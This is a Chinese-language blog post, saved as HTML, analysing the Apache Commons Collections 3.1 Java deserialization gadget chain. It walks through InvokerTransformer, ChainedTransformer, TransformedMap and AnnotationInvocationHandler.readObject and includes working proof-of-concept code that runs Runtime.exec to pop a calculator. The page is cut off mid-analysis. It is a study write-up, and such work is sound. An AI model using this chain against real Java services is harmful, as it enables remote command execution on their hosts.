

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="对于Apache Commons Collections 3.1反序列化链的初探，简单分析，复现和理解">
<meta property="og:type" content="article">
<meta property="og:title" content="Apache Commons Collections 3.1链初探">
<meta property="og:url" content="https://xianbeil.github.io/2022/03/08/javacc31study/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="对于Apache Commons Collections 3.1反序列化链的初探，简单分析，复现和理解">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220306101448-wzum3gl.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220306101853-0asjzwi.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220306102341-sp8f9s2.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220306104500-qq6ctvk.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307093339-lqwbyhx.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307093614-mqbkb82.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307095802-ieq9fmc.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307095912-ajqul2v.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307100321-fsqthc6.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307102335-k93svzi.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307102840-vbi5evz.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307153158-3fuixr7.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307161309-3m83aem.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307184540-fonjrqr.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307190628-o5uyrjb.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307202856-l81uvlp.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307210357-0iai9k9.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307212430-yfht9sw.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220307213755-iwy8gr6.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220308015633-d90jogg.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220308015818-nqdozu7.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220308020444-nthp1e5.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220308033859-dq9ssky.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220308034152-8nduzjh.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220308034523-lsxt49z.png">
<meta property="og:image" content="https://o.130014.xyz/2022/03/08/image-20220308035447-qgsqcmt.png">
<meta property="article:published_time" content="2022-03-07T20:12:19.000Z">
<meta property="article:modified_time" content="2022-04-22T10:40:23.379Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="java反序列化">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://o.130014.xyz/2022/03/08/image-20220306101448-wzum3gl.png">
  
  
  
  <title>Apache Commons Collections 3.1链初探 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xianbeil.github.io","root":"/","version":"1.9.0","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Apache Commons Collections 3.1链初探"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-03-08 04:12" pubdate>
          2022年3月8日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          11k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          92 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Apache Commons Collections 3.1链初探</h1>
            
            <div class="markdown-body">
              
              <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>Commons Collections利用链简称CC链，是Java反序列化学习中的重要一环。</p>
<p>本文初探最开始的一条链子，进行分析。</p>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><p>jdk1.7.080 + Apache Commons Collections 3.1</p>
<p>jar包可以在mvnrepository找到，<a target="_blank" rel="noopener" href="https://mvnrepository.com/artifact/commons-collections/commons-collections/3.1">https://mvnrepository.com/artifact/commons-collections/commons-collections/3.1</a></p>
<p>使用网上公开的payload编译运行，弹出计算器</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> org.apache.commons.collections.Transformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.TransformedMap;<br><br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Map;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">EvalObject</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        Transformer[] transformers = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Transformer</span>[]&#123;<br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">ConstantTransformer</span>(Runtime.class),<br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[<span class="hljs-number">0</span>]&#125;),<br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-literal">null</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[<span class="hljs-number">0</span>]&#125;),<br>                <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;mate-calc&quot;</span>&#125;)<br>        &#125;;<br><br>        <span class="hljs-comment">//将transformers数组存入ChaniedTransformer这个继承类</span><br>        <span class="hljs-type">Transformer</span> <span class="hljs-variable">transformerChain</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ChainedTransformer</span>(transformers);<br><br>        <span class="hljs-comment">//创建Map并绑定transformerChain</span><br>        <span class="hljs-type">Map</span> <span class="hljs-variable">innerMap</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>();<br>        innerMap.put(<span class="hljs-string">&quot;value&quot;</span>, <span class="hljs-string">&quot;value&quot;</span>);<br>        <span class="hljs-type">Map</span> <span class="hljs-variable">outerMap</span> <span class="hljs-operator">=</span> TransformedMap.decorate(innerMap, <span class="hljs-literal">null</span>, transformerChain);<br><br>        <span class="hljs-comment">//触发漏洞</span><br>        Map.<span class="hljs-type">Entry</span> <span class="hljs-variable">onlyElement</span> <span class="hljs-operator">=</span> (Map.Entry) outerMap.entrySet().iterator().next();<br>        onlyElement.setValue(<span class="hljs-string">&quot;foobar&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>接着就要分析利用链</p>
<h1 id="InvokerTransformer-class"><a href="#InvokerTransformer-class" class="headerlink" title="InvokerTransformer.class"></a>InvokerTransformer.class</h1><p>这个漏洞产生的根源在于org.apache.commons.collections.functors.InvokerTransformer类中，存在这样一个反射调用的方法</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220306101448-wzum3gl.png" srcset="/img/loading.gif" lazyload alt="image-20220306101448-wzum3gl.png"></p>
<p>不难看出，如果我们控制了这四个参数，利用反射，我们就可以调用任意方法，执行任意命令</p>
<p>input参数不必说，为传入的对象</p>
<p>iMethodName为获取的方法名称，iParamTypes为获取的方法参数类型</p>
<p>iParamTypes为调用方法时的参数</p>
<p>构造方法中可以直接传入</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220306101853-0asjzwi.png" srcset="/img/loading.gif" lazyload alt="image-20220306101853-0asjzwi.png"></p>
<p>如此我们可以测试一下：<img src="https://o.130014.xyz/2022/03/08/image-20220306102341-sp8f9s2.png" srcset="/img/loading.gif" lazyload alt="image-20220306102341-sp8f9s2.png"></p>
<p>但是这只局限于本地，要在远程，反序列化后调用恶意方法，得修改代码，因为远程不可能有最后transform调用传入Runtime实例的这一行。</p>
<h1 id="ChainedTransformer-class"><a href="#ChainedTransformer-class" class="headerlink" title="ChainedTransformer.class"></a>ChainedTransformer.class</h1><p>Runtime 类并没有继承 Serializable 接口 , 因此我们无法直接传入实例对象</p>
<p>对此，采用通过 Java 反射机制来构建 <strong><code>java.lang.Runtime.getRuntime().exec()</code></strong> 方法调用链</p>
<p>但是要拿到Runtime实例要调用多种反射方法</p>
<p>因此要调用 getMethod() , getRuntime() , exec() , invoke() 这四个方法</p>
<p>org.apache.commons.collections.functors.ChainedTransformer类中，构造函数能传入一个transformer数组，然后transform方法会便利这个数组，调用数组中每个元素的transform方法，然后把获取到的方法返回，递归作为下一次transform方法的参数</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220306104500-qq6ctvk.png" srcset="/img/loading.gif" lazyload alt="image-20220306104500-qq6ctvk.png"></p>
<p>我们就可以利用这个类来创建反射调用链</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs java">org.apache.commons.collections.Transformer[] transformers = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Transformer</span>[]&#123;<br><br>        <span class="hljs-comment">//获取到Runtime.getRuntime方法</span><br>        <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[<span class="hljs-number">0</span>]&#125;),<br>        <span class="hljs-comment">//反射调用getRuntime，获取到Runtime类</span><br>        <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-literal">null</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[<span class="hljs-number">0</span>]&#125;),<br>        <span class="hljs-comment">//反射调用exec方法</span><br>        <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvokerTransformer</span>(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Class</span>[]&#123;String.class&#125;, <span class="hljs-keyword">new</span> <span class="hljs-title class_">Object</span>[]&#123;<span class="hljs-string">&quot;calc.exe&quot;</span>&#125;)<br>&#125;;<br></code></pre></td></tr></table></figure>

<h1 id="ConstantTransformer-class"><a href="#ConstantTransformer-class" class="headerlink" title="ConstantTransformer.class"></a>ConstantTransformer.class</h1><p>如何在开始获取到Runtime实例对象，来getMethod，ConstantTransformer.class类中提供了方法</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307093339-lqwbyhx.png" srcset="/img/loading.gif" lazyload alt="image-20220307093339-lqwbyhx.png"></p>
<p>可以在构造函数里传入Runtime对象，然后ConstantTransformer.transform会返回它</p>
<p>就可以这样构造</p>
<p>如此一来，无论transform方法中传入什么参数，都将执行我们构造的恶意链中的内容</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307093614-mqbkb82.png" srcset="/img/loading.gif" lazyload alt="image-20220307093614-mqbkb82.png"></p>
<h1 id="攻击链"><a href="#攻击链" class="headerlink" title="攻击链"></a>攻击链</h1><p>上面虽然成功构造了反射命令执行链子，但是仍需要手动触发transform方法，实际情况中很少，所以要解决这个问题</p>
<p>我们想要在反序列化，也就是readObject方法的时候就调用恶意链，根据上一章，我们可以中重写此方法，实现defaultReadObject()方法，添加恶意功能，他仍然能被正常序列化和反序列化.</p>
<p>综上所述，</p>
<p><em>要在一个重写了的readObject方法中找到transform方法，且调用这个方法的实例可控。</em></p>
<h2 id="TransformedMap-攻击链"><a href="#TransformedMap-攻击链" class="headerlink" title="TransformedMap 攻击链"></a>TransformedMap 攻击链</h2><p>主要围绕org.apache.commons.collections.map.TransformedMap类</p>
<p>简单阅读下这个类信息</p>
<p>checkSetValue中调用了transform方法</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307095802-ieq9fmc.png" srcset="/img/loading.gif" lazyload alt="image-20220307095802-ieq9fmc.png"></p>
<p>this.valueTransFormer可以在构造方法的时候传入，我们可控！</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307095912-ajqul2v.png" srcset="/img/loading.gif" lazyload alt="image-20220307095912-ajqul2v.png"></p>
<p>它的构造方法是私有的，通过调用decorate方法返回一个新的TransformedMap类</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307100321-fsqthc6.png" srcset="/img/loading.gif" lazyload alt="image-20220307100321-fsqthc6.png"></p>
<p>因为decorate方法第一个参数要传入一个Map类型的对象，直接创建一个hashmap是最快的方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-comment">//初始一个hashmap</span><br>        <span class="hljs-type">HashMap</span> <span class="hljs-variable">map</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>();<br>        map.put(<span class="hljs-literal">null</span>,<span class="hljs-literal">null</span>);<br><br>        <span class="hljs-type">Map</span> <span class="hljs-variable">outMap</span> <span class="hljs-operator">=</span> TransformedMap.decorate(map, <span class="hljs-literal">null</span>, chainedTransformer);<br></code></pre></td></tr></table></figure>

<p>这样就调用了decorate方法</p>
<p>下面问题就是怎么调用checkSetValue方法</p>
<h3 id="AbstractInputCheckedMapDecorator-MapEntry-setValue"><a href="#AbstractInputCheckedMapDecorator-MapEntry-setValue" class="headerlink" title="AbstractInputCheckedMapDecorator$MapEntry.setValue()"></a>AbstractInputCheckedMapDecorator$MapEntry.setValue()</h3><p>这个类是TransformedMap的父类</p>
<p>其中静态类MapEntry的setValue方法调用了我们的目标方法checkSetValue</p>
<p>也就是说要调用setValue方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">static</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MapEntry</span> <span class="hljs-keyword">extends</span> <span class="hljs-title class_">AbstractMapEntryDecorator</span> &#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">final</span> AbstractInputCheckedMapDecorator parent;<br><br>    <span class="hljs-keyword">protected</span> <span class="hljs-title function_">MapEntry</span><span class="hljs-params">(Entry entry, AbstractInputCheckedMapDecorator parent)</span> &#123;<br>        <span class="hljs-built_in">super</span>(entry);<br>        <span class="hljs-built_in">this</span>.parent = parent;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> Object <span class="hljs-title function_">setValue</span><span class="hljs-params">(Object value)</span> &#123;<br>        value = <span class="hljs-built_in">this</span>.parent.checkSetValue(value);<br>        <span class="hljs-keyword">return</span> <span class="hljs-built_in">super</span>.entry.setValue(value);<br>    &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p>将this.parent指向TransformedMap实例对象，就可以调用目标方法</p>
<p>然而这个静态类的构造函数也是私有的</p>
<h3 id="AbstractInputCheckedMapDecorator-EntrySetIterator-next"><a href="#AbstractInputCheckedMapDecorator-EntrySetIterator-next" class="headerlink" title="AbstractInputCheckedMapDecorator$EntrySetIterator.next()"></a>AbstractInputCheckedMapDecorator$EntrySetIterator.next()</h3><p>静态类EntrySetIterator中的next方法调用了这个构造函数，返回MapEntry实例对象</p>
<p>这就是我们要找的，用来调用上面setValue的对象</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307102335-k93svzi.png" srcset="/img/loading.gif" lazyload alt="image-20220307102335-k93svzi.png"></p>
<p>因为构造函数中的this.parent我们还是不可控，所以继续更进</p>
<p>来自于EntrySetIterator()中，更进看哪里调用了这个构造函数</p>
<h3 id="AbstractInputCheckedMapDecorator-EntrySet-iterator"><a href="#AbstractInputCheckedMapDecorator-EntrySet-iterator" class="headerlink" title="AbstractInputCheckedMapDecorator$EntrySet.iterator()"></a>AbstractInputCheckedMapDecorator$EntrySet.iterator()</h3><p>可以看到在EntrySet静态类中的iterator调用了上面的EntrySetIterator()，它返回一个AbstractInputCheckedMapDecorator$EntrySetIterator实例对象</p>
<p>但是同样this.parent还是不可控，继续更进</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307102840-vbi5evz.png" srcset="/img/loading.gif" lazyload alt="image-20220307102840-vbi5evz.png"></p>
<h3 id="AbstractInputCheckedMapDecorator-entrySet"><a href="#AbstractInputCheckedMapDecorator-entrySet" class="headerlink" title="AbstractInputCheckedMapDecorator.entrySet()"></a>AbstractInputCheckedMapDecorator.entrySet()</h3><p><img src="https://o.130014.xyz/2022/03/08/image-20220307153158-3fuixr7.png" srcset="/img/loading.gif" lazyload alt="image-20220307153158-3fuixr7.png"></p>
<p>这里会根据 isSetValueChecking() 方法的返回值决定是否调用</p>
<p>AbstractInputCheckedMapDecorator.EntrySet() 方法 ，返回上面我们需要的对象</p>
<p>抽象类AbstractInputCheckedMapDecorator是TransformedMap 的父类</p>
<p>因此这里我们可以直接将 this 指向 TransformedMap</p>
<p>也就是用TransformedMap对象直接调用entrySet方法</p>
<p>最后是isSetValueChecking()方法，它要返回一个true</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307161309-3m83aem.png" srcset="/img/loading.gif" lazyload alt="image-20220307161309-3m83aem.png"></p>
<p>略过</p>
<h3 id="总结TransformedMap攻击链"><a href="#总结TransformedMap攻击链" class="headerlink" title="总结TransformedMap攻击链"></a>总结TransformedMap攻击链</h3><p>这样一来利用链就到头了</p>
<p>我们不需要直接调用transform方法，只要通过entrySet&#x3D;&gt;iterator&#x3D;&gt;next&#x3D;&gt;setValue就可以调用到transform方法</p>
<p>而我们一开始调用entrySet的对象，是我们可控构造的TransformedMap对象，里面包含了可控的，上面构造的反射调用链子</p>
<p>这样一来便可以达到我们的最终目的：在下面重写readObject，反序列化的时候就可以自动触发攻击</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307184540-fonjrqr.png" srcset="/img/loading.gif" lazyload alt="image-20220307184540-fonjrqr.png"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-comment">//初始化TransformMap，传入构造的反射执行链</span><br><span class="hljs-type">Map</span> <span class="hljs-variable">outMap</span> <span class="hljs-operator">=</span> TransformedMap.decorate(map, <span class="hljs-literal">null</span>, chainedTransformer);<br><span class="hljs-comment">//触发漏洞</span><br>Map.<span class="hljs-type">Entry</span> <span class="hljs-variable">next</span> <span class="hljs-operator">=</span> (Map.Entry) outMap.entrySet().iterator().next();<br>next.setValue(<span class="hljs-string">&quot;xianbei&quot;</span>);<br></code></pre></td></tr></table></figure>

<p><img src="https://o.130014.xyz/2022/03/08/image-20220307190628-o5uyrjb.png" srcset="/img/loading.gif" lazyload alt="image-20220307190628-o5uyrjb.png"></p>
<h3 id="sun-reflect-annotation-AnnotationInvocationHandler"><a href="#sun-reflect-annotation-AnnotationInvocationHandler" class="headerlink" title="sun.reflect.annotation.AnnotationInvocationHandler"></a>sun.reflect.annotation.AnnotationInvocationHandler</h3><p>现在的目标：找到一个重写的readObject方法，里面调用到了setValue()，也就是上面反序列化链子的入口</p>
<p>jdk1.7的sun.reflect.annotation.AnnotationInvocationHandler类的readObject()中调用了目标方法</p>
<p><img src="https://o.130014.xyz/2022/03/08/image-20220307202856-l81uvlp.png" srcset="/img/loading.gif" lazyload alt="image-20220307202856-l81uvlp.png"></p>
<p>对这个方法进行分析，自己先看了一下发现，原来自己的分析方式有点不够好，这里跟着大佬的分析方式走</p>
<h4 id="1"><a href="#1" class="headerlink" title="1."></a>1.</h4><p>我们的目标当然是调用 AbstractInputCheckedMapDecorator$MapEntry.setValue()</p>
<p>首先有这几个条件：</p>
<p>var5为AbstractInputCheckedMapDecorator$MapEntry</p>
<blockquote>
<p><code>Entry var5 = (Entry)var4.next();</code></p>
<p>所以只要让var4为AbstractInputCheckedMapDecorator$EntrySetIterator即可</p>
</blockquote>
<p>var7.isInstance(var8)为false且var7!&#x3D;null</p>
<blockquote>
<p>B.Class.isInstance(a)：</p>
<p>a 是否能强转为 B 类型</p>
<p>var6为var5的键值，var7为(Class)var3.get(var6)的返回值</p>
<p>var8是var5的值</p>
</blockquote>
<p>var8 instanceof ExceptionProxy为false</p>
<h4 id="2"><a href="#2" class="headerlink" title="2."></a>2.</h4><p>接着往上看var3和var4</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Iterator</span> <span class="hljs-variable">var4</span> <span class="hljs-operator">=</span> <span class="hljs-built_in">this</span>.memberValues.entrySet().iterator();<br></code></pre></td></tr></table></figure>

<p>我们希望this.memberValues指向AbstractInputCheckedMapDecorator下的Transformer类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Map</span> <span class="hljs-variable">var3</span> <span class="hljs-operator">=</span> var2.memberTypes();<br></code></pre></td></tr></table></figure>

<p>跟进memberTypes方法</p>
